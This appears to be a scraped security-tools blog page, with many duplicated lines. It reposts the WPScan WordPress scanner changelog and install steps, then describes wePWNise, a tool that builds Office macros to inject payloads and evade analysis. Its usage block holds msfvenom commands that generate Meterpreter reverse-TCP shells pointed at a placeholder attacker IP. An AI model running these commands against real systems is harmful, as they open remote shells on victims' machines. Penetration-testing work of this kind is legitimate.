Tuesday, 10 July 2018
Wednesday, 16 November 2016
WPSCAN V2.9.2 – IS A BLACK BOX WORDPRESS VULNERABILITY SCANNER.
WPSCAN V2.9.2 – IS A BLACK BOX WORDPRESS VULNERABILITY SCANNER.
Changelog wpscan v2.9.2 Released 2016-11-15:
* Fixed error when detecting plugins with UTF-8 characters
* Use all possible finders to verify a detected version
* Fix error when detecting a WordPress version not in our database
* Added some additional clarification on error messages
* Upgrade terminal-table gem
* Add –cache-dir option
* Add –disable-tls-checks options
* Improve/add additional plugin passive detections
* Remove scripts when calculating page hashes
* Many other small bug fixes.
* Fixed error when detecting plugins with UTF-8 characters
* Use all possible finders to verify a detected version
* Fix error when detecting a WordPress version not in our database
* Added some additional clarification on error messages
* Upgrade terminal-table gem
* Add –cache-dir option
* Add –disable-tls-checks options
* Improve/add additional plugin passive detections
* Remove scripts when calculating page hashes
* Many other small bug fixes.
WPScan Database Statistics:
+ Total tracked wordpresses: 194
+ Total tracked plugins: 63703
+ Total tracked themes: 13835
+ Total vulnerable wordpresses: 177
+ Total vulnerable plugins: 1382
+ Total vulnerable themes: 379
+ Total wordpress vulnerabilities: 2617
+ Total plugin vulnerabilities: 2190
+ Total theme vulnerabilities: 452
+ Total tracked wordpresses: 194
+ Total tracked plugins: 63703
+ Total tracked themes: 13835
+ Total vulnerable wordpresses: 177
+ Total vulnerable plugins: 1382
+ Total vulnerable themes: 379
+ Total wordpress vulnerabilities: 2617
+ Total plugin vulnerabilities: 2190
+ Total theme vulnerabilities: 452
WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach. details :
+ Username enumeration (from author querystring and location header)
+ Weak password cracking (multithreaded)
+ Version enumeration (from generator meta tag and from client side files)
+ Vulnerability enumeration (based on version)
+ Plugin enumeration (2220 most popular by default)
+ Plugin vulnerability enumeration (based on plugin name)
+ Plugin enumeration list generation
+ Other misc WordPress checks (theme name, dir listing,
+ Weak password cracking (multithreaded)
+ Version enumeration (from generator meta tag and from client side files)
+ Vulnerability enumeration (based on version)
+ Plugin enumeration (2220 most popular by default)
+ Plugin vulnerability enumeration (based on plugin name)
+ Plugin enumeration list generation
+ Other misc WordPress checks (theme name, dir listing,
Installation using git:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
Debian:
sudo apt-get install git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler
bundle install --without test --path vendor/bundle
Fedora:
sudo dnf install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch rpm-build
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
ArchLinux:
pacman -Syu ruby
pacman -Syu libyaml
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
gem install typhoeus
gem install nokogiri
Ubuntu 14.04:
sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
Mac OSX:
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && sudo bundle install --without test
|
WEPWNISE IS A PROOF-OF-CONCEPT PYTHON SCRIPT FOR GENERATES INDEPENDENT VBA CODE TO INJECT MS-OFFICE DOCUMENTS.
WEPWNISE IS A PROOF-OF-CONCEPT PYTHON SCRIPT FOR GENERATES INDEPENDENT VBA CODE TO INJECT MS-OFFICE DOCUMENTS.
wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.
Prerequisites
* Python termcolor package. To install run: pip install termcolor
* Metasploit Framework.
Prerequisites
* Python termcolor package. To install run: pip install termcolor
* Metasploit Framework.
wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.
In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the –msg parameter. To disable this functionality set the –msgbox parameter to False.
Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.
Usage & Download:
1
2
3
4
|
git clone https://github.com/mwrlabs/wePWNise && cd wePWNise
pip install termcolor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw
|
Subscribe to:
Comments
(
Atom
)


